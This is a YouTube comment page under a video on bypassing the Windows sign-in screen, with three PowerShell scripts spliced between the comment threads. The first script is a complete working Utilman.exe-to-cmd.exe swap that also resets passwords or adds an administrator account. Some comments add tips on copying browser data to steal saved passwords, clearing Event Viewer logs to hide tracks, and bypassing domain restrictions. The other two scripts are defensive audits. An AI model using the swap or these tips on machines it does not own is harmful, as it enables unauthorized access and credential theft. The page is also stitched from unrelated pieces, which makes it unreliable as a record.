How hackers bypass the Windows login screen!

  • Published 21 Dec 2024

COMMENTS • 1.8K

  • @404-UsernameNotFound · 1 year ago · +883

    7:00 Brings a whole new meaning to the tooltip "Ease of Access"

    • @PartiallyCooked · 1 year ago · +1

      @Third-Party Apple Support do you go around assisting people with Apple products?

    • @HyperVectra · 1 year ago · +1

      @PartiallyCooked Why would he? When iCloud Photos scans images to find CSAM, and reports it to Apple directly. They've streamlined the whole process.

    • @SpaceCadet4Jesus · 1 year ago · +1

      This is an old old tip. Been working since at least Windows 7. Unsure if it still works in Windows 11. I'll try it if I get around to it.

    • @samfkt · 1 year ago · +4

      @SpaceCadet4Jesus It works since Win 98/95.... Since 98 (maybe 95 too) this can also be done with the error message (don't send): a couple of clicks here and there and a fatal error appears, but you are INSIDE....

    • @ATTIQ_OFFICIAL · 1 year ago

      @Third-Party Apple Support third-party Apple product 💀

  • @ZeevYisrael · 1 year ago · +12

    Been an SE since Windows NT and I'm left baffled lol. THIS is what I LOVE about I.T. You never stop learning. Well done.

  • @delvinciposterkid · 1 year ago · +30

    I fondly remember doing this exercise during a PC repair class I attended, pretty useful for clients that are "forgetful".

    • @Javv1721 · 1 year ago · +2

      Same

    • @T0psyDurpy · 11 months ago · +3

      I wish I could send my PC to you, I don't know how to do any of this 😭

    • @robincordero3 · 4 months ago

      @T0psyDurpy I can just look at a video one time and do it lol

  • @trinityfoxxx · 1 year ago · +6

    Excellent video my friend. I haven't logged into my laptop for 2 years and I forgot my password; I tried different passwords for 2 weeks but couldn't remember. This video saved me over $100 at the computer shop to get them to do it. I fixed it myself at home in front of the TV :)

  • @gustavogattinger · 1 year ago · +864

    There is an even easier way in which you don't have to use the cmd to rename and copy cmd: open notepad.exe from the cmd, navigate from the Open File menu, and change whatever you want. Windows is really easy to hack at these levels; all you need to do is a little research.
    As always, great content!

    • @bluetopia42 · 1 year ago · +13

      Yeah, wasn't it like CTRL+ALT+DEL and run the cmd task?

    • @RotemNeshaGalea · 1 year ago · +24

      I try to follow you but you don't have content

    • @Redwan777 · 1 year ago · +20

      And it doesn't even have to be Windows installation media. Any Linux installation media will be enough too, and if it has a Live USB you can enjoy the comfort of editing files from a GUI file manager. Unless that Linux doesn't come prepackaged with Secure Boot nonsense, of course.

    • @Redwan777 · 1 year ago · +5

      @miguelquintana7084 For what?

    • @ragtop63 · 1 year ago · +31

      And how, pray tell, do you gain access to the computer to even open Notepad in the first place?

  • @boardingurban · 1 year ago · +42

    Not the commands and actions I do during this exploit, but very informative nonetheless without teaching people how to do damage. There are additional steps to make it untraceable, especially on enterprise computers (where you would also have to unplug Ethernet before boot). Nice choice with the Windows install IMG over Linux (simpler to use, and allows you to just use the computer on your own OS), as it is digitally signed by MS and less likely to trigger the unsigned drive error (which would require a BIOS password [not hard to bypass]). However, this will not work on an encrypted drive, which I encourage all IT managers to undergo. BitLocker takes 5 min to set up domain-wide. To prevent this attack on your machine, set a BIOS password, set another password for the boot loader/menu, encrypt your drives, and disable automatic startup repair.

    • @smojovi · 1 year ago · +2

      Definitely BitLocker, and disable boot from USB.

    • @IndrajitPoirahInsomniac · 1 year ago

      How is it possible to open the computer without the user knowing? I.e. the password can't be changed, or can the password be seen?

    • @boardingurban · 1 year ago

      @IndrajitPoirahInsomniac Specify your question. I don't understand what you mean by the user knowing.

    • @IndrajitPoirahInsomniac · 1 year ago

      @boardingurban I mean how to know the password of Windows without changing or disabling it

    • @boardingurban · 1 year ago

      @IndrajitPoirahInsomniac Oh, easy. Boot menu / Windows install disc / Repair your computer / cmd. Then you play around and do some things with root access, such as renaming utilman.exe to HypotheticallySpeaking.exe, copying cmd and renaming the copy to the former. After a restart, you will find it rather funny how the lock screen accessibility option will now return a root cmd window where you can just type explorer.exe and watch the PC boot w/o a password.
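The procedure the thread above describes, written out as an added example for the recovery-environment prompt; it is not the video's or any commenter's script, and it uses PowerShell rather than the cmd `move`/`copy` the comments mention. It assumes powershell.exe is available in that environment (it is on current Windows 10/11 install media; type `powershell` at the X: prompt). The backup file name, the account name and the password are placeholders chosen here. As several replies say, it only works when the Windows volume is not encrypted.

```powershell
# Added example (not the video's commands): the Utilman.exe swap from the
# recovery environment, in PowerShell. Type `powershell` at the WinRE X: prompt.
# Assumption: powershell.exe is present in the WinRE image (it is on current
# Windows 10/11 media). A BitLocker-protected volume shows up locked or empty
# here, and the swap fails.

# 1. Locate the offline Windows volume. WinRE drive letters differ from the
#    installed OS (X: is WinRE's own RAM disk and carries a SYSTEM hive too,
#    so it is excluded explicitly), so search for the hive file instead of
#    assuming C:.
$osRoot = Get-PSDrive -PSProvider FileSystem |
    Where-Object { $_.Name -ne 'X' } |
    Where-Object { Test-Path -LiteralPath (Join-Path $_.Root 'Windows\System32\config\SYSTEM') } |
    Select-Object -First 1 -ExpandProperty Root
if (-not $osRoot) { throw 'No offline Windows installation found (an encrypted volume looks empty here).' }
$sys32   = Join-Path $osRoot 'Windows\System32'
$utilman = Join-Path $sys32 'Utilman.exe'
$backup  = Join-Path $sys32 'Utilman.exe.bak'   # backup name is an arbitrary choice made here

# 2. Park the real Utility Manager and put cmd.exe in its place. The sign-in
#    screen launches Utilman.exe as SYSTEM, so after a reboot the Ease of
#    Access button opens a SYSTEM command prompt instead.
if (Test-Path -LiteralPath $backup) { throw "$backup already exists; refusing to overwrite the backup." }
Move-Item -LiteralPath $utilman -Destination $backup
Copy-Item -LiteralPath (Join-Path $sys32 'cmd.exe') -Destination $utilman
Get-Item -LiteralPath $utilman, $backup | Select-Object Name, Length, LastWriteTime

# 3. Reboot normally and click the Ease of Access icon on the sign-in screen.
#    In the prompt that appears (these are cmd.exe commands, typed there):
#      net user                                  list local accounts
#      net user <name> *                         set a new password (prompted)
#      net user helper Example-Pass-123 /add     or add a new local account
#      net localgroup Administrators helper /add
#    The account name and password above are placeholders for this example.
#    Microsoft accounts and policy-managed accounts may refuse the reset, as
#    replies above note; adding a new local administrator still works there.

# 4. Undo from the same recovery prompt afterwards, or the swap stays in place:
#      Move-Item -LiteralPath $backup -Destination $utilman -Force
```

The drive-letter search in step 1 is the part people trip over: in WinRE the installed system is often not C:, and one reply further down reports seeing only the ISO. Checking for the SYSTEM hive picks the right volume regardless of the letter.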

  • @Human_Shrek · 1 year ago · +202

    This is basically the sticky keys (bug/hack) from Windows 7: you'd hit a key 5 times and a Cmd window would pop up rather than the sticky keys message. Most companies already have USB and BIOS disabled. So this is only useful if you forget your Microsoft password.

    • @gamemak0r · 1 year ago · +2

      With BYOD it is a lot harder for IT teams to lock down on everyone having a locked BIOS with boot to USB disabled.

    • @Luftbubblan · 1 year ago · +3

      Ye, been around for ages. Interesting that they never seem to shut it down.

    • @PanoptesDreams · 1 year ago · +3

      @Luftbubblan Effectively... you can't. You're better off having remote management tools that can scan and remove unwanted software, unknown logins, etc.
      It is effectively patched by using a Microsoft account.

    • @михаилказанцев-п4щ · 1 year ago · +4

      BIOS locking is not enough. They should use disk encryption, and better, thin clients with a centralized server farm.

    • @krsameer1 · 1 year ago

      @PanoptesDreams Very old trick. This was done with Windows 7.

  • @OneBiasedOpinion · 1 year ago · +13

    I love stuff like this. Once you see the trick, it's so simple, but I would _never_ have thought of using this as a route into the command prompt screen.

  • @itsTyrion · 1 year ago · +290

    This has been known for years, around since Windows 7, and you made it potentially more complex than is needed: you can also hit the reset key twice while Windows is booting. In startup recovery, you sometimes don't even need a password to open the CMD and change things from there.

    • @Act2ve · 1 year ago

      Fr, I honestly hate "hacker" content like this shit, it's just cringy and kinda obvious

    • @munch255 · 1 year ago · +8

      @manuell3505 Is there any way to see the password without changing it?

    • @brightdorian2890 · 1 year ago · +9

      This is the only working method now; you will need a password at startup recovery when opening CMD (Windows 10).

    • @brightdorian2890 · 1 year ago · +4

      @munch255 No, the password is hashed even if you see it.

    • @manuell3505 · 1 year ago · +6

      @munch255 That's totally boarded up. You have to trace down and decrypt the key data that was generated when the password was set. Windows uses some random construct and doesn't store anything about it. For security, also the location on disk varies.
      But why would you if you can just boot another system from a USB stick and access the NTFS partitions?
      It must be hackable, though. Maybe boot the physical disk inside an emulator, so you can scan the whole virtual system's RAM for changes at address level.

  • @smashmastersstuffs · 1 year ago · +45

    The main obstacle to this is just disk encryption with BitLocker, but the number of people who don't have it on (esp. because not everyone buys Win 10 Pro and signs in with an MS account) is large enough, I think. But this is def an accurate representation of what someone could do if they stole your computer.
    In fact, if your password is weak enough they could even brute-force the hash with special software.

    • @unconnectedbedna · 1 year ago · +1

      I mean, if someone steals your computer and it is unencrypted they can just take the HD and connect it to another computer, or run a live Linux USB and access the data.
      But yes! Encryption is the absolute best protection, until you lose that darn key... xD

    • @roguethemachine3928 · 1 year ago

      You can decrypt a BitLocker file from cmd, so yeah, gl with that

    • @MAGAMAN · 1 year ago · +1

      Encryption is the best way to lose everything on your hard drive.

    • @Crimin4L · 1 year ago

      @MAGAMAN Not if you have more than 2 brain cells to save the recovery key(s)

    • @picsnmorede · 1 year ago

      @MAGAMAN Well, for people with this opinion you just have to strike 'Enter' at the password prompt and you are in without any file renaming.

  • @cxi8147 · 1 year ago · +184

    This was actually really simple :p no clickbait. Appreciate it.

    • @rahuldev2205 · 1 year ago · +3

      Bro's no clickbait.

    • @cxi8147 · 1 year ago · +4

      @rahuldev2205 A rare trait in this climate nowadays. Because of that I've been subbed since and watched a ton more of his vids.

  • @PhantomWorksStudios · 1 year ago · +45

    There are multiple ways of making this secure.
    1. For business and home, make sure that your case has a lock on it so someone can't remove the CMOS battery and reset the BIOS.
    2. Make sure the PC always boots from the hard drive first.
    3. Most importantly, make sure your BIOS has a password set.
    4. Disable the boot select menu.
    Also, Microsoft can prevent this by having the main login UI check whether any program it launches during the login screen has been tampered with, or can even block programs while on the logon screen.

    • @Embr4c3 · 1 year ago · +5

      BitLocker also works

    • @TheFurrry · 1 year ago · +3

      Resetting the BIOS will not reset the Windows login password.

    • @PhantomWorksStudios · 1 year ago · +2

      @TheFurrry No, but resetting the BIOS also clears the BIOS password, at which point the user doesn't even need access to Windows or to bypass security

    • @o.OIndyTreesO.o · 1 year ago

      Step 2 could cause you a dilemma in the future if you run into any drive problems and need to boot from a USB. Steps 3 and 4 should be enough, right lol? xD

    • @PhantomWorksStudios · 1 year ago

      @o.OIndyTreesO.o If that's the case then it would be the admin/owner that would need to boot from the CD drive, in which case they should know the password anyway

  • @elmeromero303 · 1 year ago · +15

    In some cases you can't change the password (policies etc.). You can create a new user (net user add etc.) and put them in the Administrators group, log in with this new account and you can see all local users and change their passwords. In some older versions you can also change domain users' passwords: before login, disable the network so the domain controller will not be found by the OS 😊

  • @ChaosV999 · 6 months ago

    THANK YOU!!! THANK YOU!!! Some POS hacked my computer, created a user file for himself as administrator and it was password protected. He also installed something that froze my screen within 12 seconds. He wanted $400 to "fix" my computer. I told him to stick it (I wasn't so polite). Your video allowed me to hack the hacker, put myself as administrator, remove him and all his programs, and eventually fix everything. I had your video playing on one computer while I fixed the hacked computer and your instructions were perfect. THANK YOU!

  • @NoEgg4u · 1 year ago · +6

    There is no need to do the download and USB set-up, etc.
    When starting your computer, if you shut the power a couple of times in a row, then the next time that you start the computer you will be offered a menu to repair your computer.
    I do not recall the exact menu. But if you click around, you will find the option for running the command prompt. From there, you can follow our host's instructions.
    Also note that many computers will not allow you to boot from a USB drive, which will prevent you from doing what our host described.
    For those computers, you will have to go into the BIOS and set a password. After that, you will be able to change a BIOS setting to enable booting from a USB drive. After that, you can remove your BIOS password.

    • @chilidog73 · 1 year ago

      On Win 10 (at least mine) you need the password to do anything in recovery. Sometimes you have to enter the BIOS to add a boot option to use the USB. :)

  • @TheGrowOp · 1 year ago · +1

    I used this first one on my dad's old laptop when he forgot the password. It actually startled me how easy it was!

  • @DavidOleksy-yv7vx · 1 year ago · +46

    This is a pretty neat trick when helping people get into their PCs when they've forgotten their passwords; however, I don't believe this is a common technique for actual hackers. In order for this process to work, the attacker would need to have physical access to the PC to mount the bootable USB installation drive. I'm not saying there aren't other, more advanced ways to bypass the Windows login screen by using CMD, but unless someone with malicious intent has physical access to your machine, this shouldn't be a concern. But anyway, thanks for the great video and well-explained tutorial!

    • @Emmanuel-is7gm · 1 year ago · +7

      This could work well for penetration testers

    • @swollened · 1 year ago

      This isn't limited to physical access by any stretch.
      This works for Windows Server as well as Windows 10. You could do this remotely with access to a virtual console (say through a breached Azure, AWS or other cloud provider account), an out-of-band system management tool like Dell iDRAC or HP iLO, and the media could be attached with a virtual disk mount, PXE network boot, etc.
      The reality is, though, if a hacker already has this level of access, they aren't going to waste their time attaching a Windows installation ISO.
      If you wanted to protect against this:
      - Enable BitLocker on Windows
      - Enable Secure Boot in the BIOS
      - Password-protect the BIOS.

    • @JC-is1nl · 1 year ago

      @Emmanuel-is7gm I like to do penetration testing

    • @blendingsentinel4797 · 1 year ago · +1

      @Emmanuel-is7gm Exactly

    • @Clynikal · 1 year ago

      You're right. I'm pretty sure this is the first thing he pointed out as step one.
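The controls recommended in the threads above (the four-point list from PhantomWorksStudios and swollened's BitLocker / Secure Boot / BIOS-password trio) can mostly be checked from inside Windows; firmware settings cannot, and stay a manual check. The script below is an added example, not anything from the video or the commenters. Run elevated, it reports BitLocker state on the OS volume and whether unlocking needs a pre-boot PIN, Secure Boot, TPM readiness, and whether WinRE (the Shift+Restart route several replies mention) is enabled. It assumes the BitLocker, SecureBoot and TrustedPlatformModule PowerShell modules that ship with Pro/Enterprise editions; on Home edition the BitLocker branch reports unavailable, as one reply further down notes.

```powershell
# Added example (not the video's or a commenter's): report, from inside Windows,
# the controls the replies above recommend. Firmware settings (boot order,
# BIOS/UEFI password, USB boot) are not readable from here and stay a manual
# check. Run elevated. Assumes the BitLocker, SecureBoot and
# TrustedPlatformModule modules that ship with Pro/Enterprise editions.

$report = [ordered]@{}

# Disk encryption: the one control that stops offline editing outright.
try {
    $os    = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction Stop
    $types = @($os.KeyProtector.KeyProtectorType)
    $report['BitLocker OS volume'] = "$($os.VolumeStatus); protection $($os.ProtectionStatus)"
    $report['Key protectors']      = ($types -join ', ')
    # TPM-only unlock is silent at boot; with TpmPin an attacker holding the
    # machine still faces a prompt before Windows (and its sign-in screen) loads.
    $report['Pre-boot PIN']        = [bool]($types -contains 'TpmPin')
} catch {
    $report['BitLocker OS volume'] = "unavailable: $($_.Exception.Message)"   # e.g. Home edition
}

# Secure Boot keeps unsigned boot media out, but signed Windows install media
# (the route in the video) still boots, so on its own it is a partial control.
try   { $report['Secure Boot'] = Confirm-SecureBootUEFI }
catch { $report['Secure Boot'] = 'not UEFI or unsupported' }

try   { $report['TPM ready'] = (Get-Tpm).TpmReady }
catch { $report['TPM ready'] = 'TPM cmdlets unavailable' }

# WinRE is the Shift+Restart / failed-boot path to a recovery command prompt.
# It is recorded, not changed: disabling it also removes local repair.
$re = & reagentc.exe /info 2>$null | Select-String 'Windows RE status'
$report['WinRE'] = if ($re) { ($re.Line -split ':', 2)[1].Trim() } else { 'unknown (run elevated)' }

[pscustomobject]$report | Format-List
```

Read the BitLocker lines together: a volume that is FullyEncrypted with a Tpm-only protector is still transparent to anyone who boots the machine normally, which is why the TpmPin line is reported separately.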

  • @SRADracer · 1 year ago · +2

    I have a boot CD that can "read" the passwords for all accounts.
    No idea how it works, but handy when someone lost their password.
    Works like a charm 😊

  • @blightfrog · 1 year ago · +3

    This vid is really helpful for tech support. So many occasions that we really need this. 😅

  • @dredtCSS · 1 year ago

    Could have used this some weeks ago when I was accidentally logged out of my own PC and had to reinstall Windows and lose all my data.
    Very nice video - I'm saving it!

    • @xwinglover · 1 year ago

      You could have also created a Linux ISO and booted it up. It would run as a live disk, and then copied your data out to an external drive using the file manager.

  • @Italya3343 · 1 year ago · +29

    One of the most amazing videos I have ever seen brother!!!
    Direct, simple, non-classical
    Many thanks for sharing 👍
    Looking forward to watching your next tutorials!!

    • @UltraLimeLife420 · 1 year ago

      If the BIOS is locked and USB boot is disabled this can't be possible!

    • @trondremix · 1 year ago

      @UltraLimeLife420 It is still possible unless the hard disk is encrypted. You can trigger a troubleshooter and get access to the filesystem that way.

    • @UserSOF0 · 1 year ago

      @trondremix
      So you're saying that I can bypass the BIOS password?
      Can you clarify?

  • @xistam · 1 year ago · +1

    Known about this trick for years. Used to use it all the time back at my old job in a small computer shop when someone would come in with an old laptop they didn't know the password for anymore. Crazy it still hasn't been patched to this day.

  • @firsttimegaming3557 · 1 year ago · +15

    Most computers, especially company computers, won't allow you to boot the USB without entering the BIOS first, and it's generally locked by a password. There are still ways to get around that, but this method requires a few more steps to work on most computers.

    • @mrkmpn · 1 year ago · +11

      I work in a repair shop and at least 90% of the computers I get in will boot from USB without making any changes to the BIOS, and less than 1% have the BIOS password protected. The biggest and most common obstacle these days is the increasing number of drives that are encrypted with BitLocker.

    • @vapefybeatz3322 · 1 year ago

      I'm not sure, but if you take out the BIOS battery for a few secs, the BIOS resets itself and the password is gone. Is that true?
      I've done that with an old laptop years ago; does it work nowadays?

    • @mrkmpn · 1 year ago · +1

      @vapefybeatz3322 Not necessarily. For one thing, not all laptops have BIOS batteries anymore, and the BIOS password isn't always stored in the same place and can only be changed or cleared by dumping, editing, and reflashing the BIOS with a chip programmer.

    • @Jee2024IIT · 1 year ago

      @mrkmpn How do you do that 1% of problems?

    • @rainmakersg73 · 1 year ago · +1

      Boot USB is not required. Just hold down Shift and restart. Release Shift after the restart screen appears. Then -> Troubleshoot -> Advanced options -> Command Prompt

  • @thededicatedbiker · 1 year ago

    I actually taught this years ago when I was teaching computers at a grade school. I learned it from another tutorial. Like you, I was amazed that it worked the first time I tried it.

  • @tomle2600 · 1 year ago · +36

    Doesn't work if you have a BIOS password or BitLocker enabled.
    Easier to boot from any remote disk and replace the admin password.

    • @gtarules1 · 1 year ago · +4

      @Boygadget What about BitLocker?

    • @erikjvanderveen · 1 year ago · +8

      @Boygadget Nope... your password is not in your CMOS

    • @Boygadget · 1 year ago · +2

      @gtarules1 This is only for the BIOS password. It won't work for BitLocker.

    • @mal798 · 1 year ago

      Again though, you need the BitLocker PW

    • @maklogetrich2378 · 1 year ago · +1

      @Boygadget Lame, this method hasn't been working for a long time

  • @DeepSpace_Pw · 1 year ago

    I already heard of it years ago, but thought I had read they fixed it at some point. With your upload being just 3 weeks ago, I would say it still works.

  • @juliusrowe9374 · 1 year ago · +44

    Fantastic tutorial Loi! Fairly straightforward too!

    • @BlacKi-nd4uy · 1 year ago · +1

      What is "copy cmd.exe utilman.exe" doing?

    • @jaylord55 · 1 year ago

      @BlacKi-nd4uy It is copying cmd.exe and renaming it utilman.exe in one process, so you don't have to manually rename cmd.exe after copying it into the folder, allowing you to use cmd.exe from within Windows boot

    • @exo469 · 1 year ago

      @BlacKi-nd4uy Copying the content of cmd.exe and saving it as utilman.exe

    • @kidpresident_1475 · 1 year ago · +3

      When you press the little button in the bottom-right it brings up Utility Manager. So he is changing the name of Utility Manager to Utility Manager 2, and then renaming the command line to Utility Manager, so when that button is pressed it brings up the command line instead of the Utility Manager.

    • @tomsmith6513 · 1 year ago

      This is how you hack into your boss's computer, how you get back at a bad boss.
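The swap the replies above explain leaves evidence on disk, and a copied cmd.exe still carries a valid Microsoft signature (the catalog signature covers the file's hash, not its name), so the practical check is whether each accessibility helper in System32 is still what its version resource says it is. The script below is an added example, not the video's or a commenter's code. Run elevated on the live system, it compares each helper against cmd.exe's hash, checks its OriginalFilename, its signature status, any leftover renamed copies, and the registry variant of the same hijack (an Image File Execution Options `Debugger` value that makes Windows launch another program in the helper's place). The helper list and the "suspicious" rules are choices made here; an OriginalFilename mismatch on its own is worth verifying by hand rather than treated as proof.

```powershell
# Added example (not from the video or the comments): audit the accessibility
# helpers that winlogon launches as SYSTEM on the sign-in screen. The swap
# discussed above replaces one of them with cmd.exe; a registry variant of the
# same idea sets an Image File Execution Options "Debugger" value so the helper
# launches another program instead. Run elevated on the live system.
# The helper list and the "suspicious" rules are choices made for this example.

$sys32   = Join-Path $env:SystemRoot 'System32'
$helpers = 'Utilman.exe', 'sethc.exe', 'osk.exe', 'Narrator.exe',
           'Magnify.exe', 'DisplaySwitch.exe', 'AtBroker.exe'
$cmdHash = (Get-FileHash -Algorithm SHA256 -LiteralPath (Join-Path $sys32 'cmd.exe')).Hash
$ifeo    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

$findings = foreach ($name in $helpers) {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path -LiteralPath $path)) { continue }

    $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
    $orig = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
    $sig  = (Get-AuthenticodeSignature -FilePath $path).Status
    $dbg  = (Get-ItemProperty -Path (Join-Path $ifeo $name) -Name Debugger -ErrorAction SilentlyContinue).Debugger
    # Leftovers such as Utilman.exe.bak or utilman2.exe are typical after a swap.
    $stem  = [IO.Path]::GetFileNameWithoutExtension($name)
    $spare = Get-ChildItem -LiteralPath $sys32 -Filter "$stem*" -File |
             Where-Object { $_.Name -ne $name -and $_.Extension -in '.exe', '.bak', '.old' }

    $why = @()
    # Renaming does not break a catalog signature, so a copied cmd.exe still
    # verifies as Microsoft-signed: the hash and the version resource are what
    # give it away; the signature check only catches a non-Microsoft binary.
    if ($hash -eq $cmdHash)          { $why += 'byte-identical to cmd.exe' }
    if ($orig -and $orig -ne $name)  { $why += "OriginalFilename is '$orig'" }   # -ne is case-insensitive
    if ($sig -ne 'Valid')            { $why += "signature status $sig" }
    if ($dbg)                        { $why += "IFEO Debugger = $dbg" }
    if ($spare)                      { $why += "extra files: $($spare.Name -join ', ')" }

    [pscustomobject]@{ File = $name; Suspicious = [bool]$why; Why = ($why -join '; ') }
}
$findings | Format-Table -AutoSize
```

On a clean machine every row should come back with Suspicious = False. The hash comparison is the decisive test for the exact trick in the video; the IFEO check covers the case where nothing in System32 was touched at all.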

  • @jacksch0ey · 1 year ago · +1

    Used to do this on my school computers, except it was Windows 7 and all I had to do was shut it off on reboot 3 times and then it would launch the startup troubleshooter, which allows you to access Notepad ;)

  • @ErrorXTech · 1 year ago · +2

    You don't even need any bootable drive just to fire up that X: terminal...
    > Forcibly stop Windows with the stop button, then start again. Wait 2 sec; when it's booting, stop it again.
    > Repeat this 4-6 times... now Windows will not boot normally; instead (because Windows will detect unstable booting issues) it will show you the screen with a lot of things to repair Windows like restart, reset, etc. From there you will have an option for "Command tool" inside the advanced options.
    Booyah!!!!

  • @arduinoguru7233 · 1 year ago · +7

    6:48 BTW you can do all this stuff with the smallest Linux distros; you can even get utilities to change the password and modify the Windows registry

  • @jonjones6017 · 1 year ago

    I first saw someone (a CEH) do this about 6 months ago and I was shocked and intrigued to study CEH as well. The difference was at the CMD he created a local admin account on the machine and logged in with that

  • @longlost8424 · 1 year ago · +14

    You can also do this by booting into "repair" mode. I've accomplished this by power cycling the system several times, and then using the command screen to do basically the same thing. I've also used the Hiren's boot CD to reset the administrator account password (client as well as server). Will need to try this method again someday on a winders 11 system. As always Loi, gr8 tutorial.......

    • @ShinyTechThings · 1 year ago · +2

      Same here, no USB needed. Hold Shift and click on reboot.

    • @jamieclarke2694 · 1 year ago

      @ShinyTechThings Just about to say this. Had to the other day and wasn't aware the safe mode boot process had changed.

    • @borko.danilovic · 1 year ago · +2

      To get to the command screen in recovery mode, you also need the profile password.

    • @maklogetrich2378 · 1 year ago · +1

      No, you can't.
      In order to use recovery mode, you have to input the user password.
      And by the way, you don't really need to power cycle the system; just get to the Windows user login, click the power button, and hold the Shift button while clicking the restart button.
      It's easier and reduces the possibility of breaking your system.
      Or better yet, just use some kind of Hiren's boot / mini Windows.

    • @Nehesi · 1 year ago

      I don't think this would work on a BL machine or one that has an admin password for the BIOS.

  • @painfull73 · 1 year ago

    Ohhhh, 7 DAYS ago!! Wow! I thought it said 7 YEARS ago when this video was uploaded. Given the content, that made sense, because this hack is as old as Windows 7! :D 8/10 for production value though ;)

  • @cougar-town · 1 year ago · +22

    I knew about this over a decade ago. But thanks for sharing it anyway.

    • @john_doe1st · 1 year ago · +8

      Funny no one has seen your video about it.

    • @jamieclarke2694 · 1 year ago

      @john_doe1st I've seen it, at least a decade ago

    • @Luftbubblan · 1 year ago

      @john_doe1st It sure is an old thing, almost to the point it should be common knowledge! Sticky keys :D

    • @abritabroadinthephilippines · 1 year ago

      @hk0444 This channel doesn't have any content

    • @AndrewSpec · 1 year ago

      Yup, I used that many years ago.

  • @speakupOfficial · 1 year ago · +2

    FYI: This works on every single version of Windows since XP (including Windows 11). Microsoft knows about this backdoor and is intentionally keeping it available. I've tested this myself. It only works on non-domain PCs though. But once you're in, you could simply copy the AppData from Chrome or other browsers. Just copy it to the USB. These files contain every password saved in that browser, and you can easily get to it by replacing the AppData folder on another computer. I hacked my own passwords in 7 minutes. Scary stuff.
    Also: Don't forget to erase your tracks in the Event Viewer.

  • @Aguga · 1 year ago · +10

    If the user account you are targeting is a Microsoft account, it could be that you can't change the password. In that case you could just create a new user with admin rights.

  • @fanprocar · 1 year ago

    I wrote the instructions down on paper and memorised them after many tries. Thanks a lot for this video!

  • @neymat3257 · 1 year ago · +7

    You can do the same without a USB Windows bootable drive; only physical access is required.
    To avoid this: use drives with auto BitLocker enabled, which unlock automatically after your login and auto-lock after reboot or power-off.
    Whenever someone tries the same they will face BitLocker encryption.
    Good guide, keep it up 👍

    • @nguyenquy3659 · 1 year ago

      "You can do the same without a USB Windows bootable drive; only physical access is required" => Do you mean force turning off the computer 3-4 times?

    • @ThatOne5 · 9 months ago

      Well, to open the CMD you'll still need a password in recovery mode, I've just tried it, unless you are talking about another method.

    • @farazhayder8473 · 5 months ago

      In Windows Home edition BitLocker encryption is not available. Do you know any other way to avoid this?

  • @SinOfLustAMV · 1 year ago

    Thanks.. this is helpful in case we forget the password of a local account.. simple and straight to the point!

    • @SOTP. · 1 year ago · +1

      Also acts as a "debug" feature which is really useful when you break Windows (you have to use sticky keys though), since usually you're locked out from getting to a cmd or gaining control, but with this...

  • @joearcidiacono264 · 1 year ago · +6

    This is one method, but I just prefer a bootable USB and running tools such as Hiren's (there are many, many, many others). Much easier. However, I must warn that those tools are ONLY meant for technicians to troubleshoot an owner's machine or help an owner retrieve old files they may need.

  • @l21kato · 10 days ago · +1

    Thank you lio lian liang for making a tutorial for non-local accounts

  • @Stiwjak · 1 year ago · +5

    Are you doing the same on Windows 11? With all the latest updates + Defender?

    • @MacGuffin1 · 1 year ago · +1

      I doubt it, I don't think this works anymore

    • @Deezeone · 1 year ago

      @MacGuffin1 Nah, it doesn't see C: anymore, only the ISO

  • @tallpaul9475 · 1 year ago · +1

    This seems so much easier/simpler than using a Linux ISO boot to redo account passwords. Thanks for the info!

  • @kaiduwu · 1 year ago · +8

    Known this for a very long time, quite useful sometimes!

    • @404_gaming_channel9 · 1 year ago

      I'm sure it still works as well in Windows 11

    • @AK_Studioz · 1 year ago

      Which times 😂?

    • @kaiduwu · 1 year ago

      @AK_Studioz Here's one: a relative found a lost laptop from many years ago, doesn't know the login, brings it to me because I'm known to be into cybersec, I can quickly fix it for them.
      Another, more nefarious use: bypassing restrictions on domain computers

    • @geroffmilan3328 · 1 year ago

      If the stars align, yeah, it's useful.
      But if BitLocker is implemented properly, no dice; choose another vector.

    • @kaiduwu · 1 year ago

      @geroffmilan3328 The stars align? More like flipping a coin; many PCs just don't use BitLocker.
      However yes, if BitLocker is set up, you're outta luck with that method.

  • @toastedBook · 1 year ago

    So this is why in my previous school we had to agree not to use USBs on the computers without permission. Also I hacked myself cuz I did a typo when changing my password. So thanks for the very simple and useful tutorial 👍 now I have to finish organizing my files

  • @DS6Prophet · 1 year ago · +31

    I wanted to tell you a huge thank you for all your incredible showcases & work! You inspired me to get into all this cyber security stuff! You are amazing, Mr Loi!

    • @TheMessanger · 1 year ago

      Just use AD and you're in

    • @mr.simpleeditor7157 · 1 year ago

      @TheMessanger AD?

    • @jamieclarke2694 · 1 year ago

      @TheMessanger Active Directory? 🤣

    • @TheMessanger · 1 year ago

      @Jamie Clarke Close, but not what would u use

    • @jamieclarke2694 · 1 year ago · +1

      @TheMessanger Close? AD is Active Directory lol, you need another acronym if you're talking about something else, or just say the name of it, the YouTube police aren't coming to get you ya know, no need for encryption on a YouTube comment 😅

  • @member529 · 1 year ago · +2

    I thought this was going to be how to get past it while the user is logged in / without having to reboot. :(
    This password reset trick is oooooooold

  • @we_are_fsociety_29 · 1 year ago · +6

    You are awesome 🤠. Sir, make a video on Android Termux.

  • @jamesrichardson3115 · 1 year ago · +1

    I think it's funny how armchair hacks reply with disgust, remembering some hack a computer guy or Google gave them. You bring a fresh breath to the younger crowd to get them involved. Props bro, from an old hack 😂

  • @mukeshpatil6887 · 1 year ago · +4

    Also, if this hack needs to be performed in a big organization then it'd be better to have the network cable disconnected and carry out the operation, otherwise CrowdStrike detects this one. (Anyway, when it's back online it will detect it) 🙁

  • @jbooks888 · 1 year ago

    Oh yeah, real easy. I just went to get a coffee and I almost fell over from dizziness and mental confusion. I DID NOT understand a word you said.

  • @florianvo7616
    @florianvo7616 Рік тому +10

    a bit of research: this technique only ever worked with local windows accounts, not with microsoft accounts. Also it doesn't work anymore since "Windows 10 1809"

    • @tairikuokami
      @tairikuokami Рік тому

      It works on the latest Windows 11. I use it as a backup, it is useful to have CMD with SYSTEM rights before logon.

    • @wangzhe5daidinnerout
      @wangzhe5daidinnerout 1 year ago

      @@tairikuokami dear, did you try the PIN+TPM (of course in Win11)+BitLocker? Or did you just try the WinAccPW+TPM (of course in Win11)+BitLocker?

    • @jochemgroeneweg6965
      @jochemgroeneweg6965 1 year ago

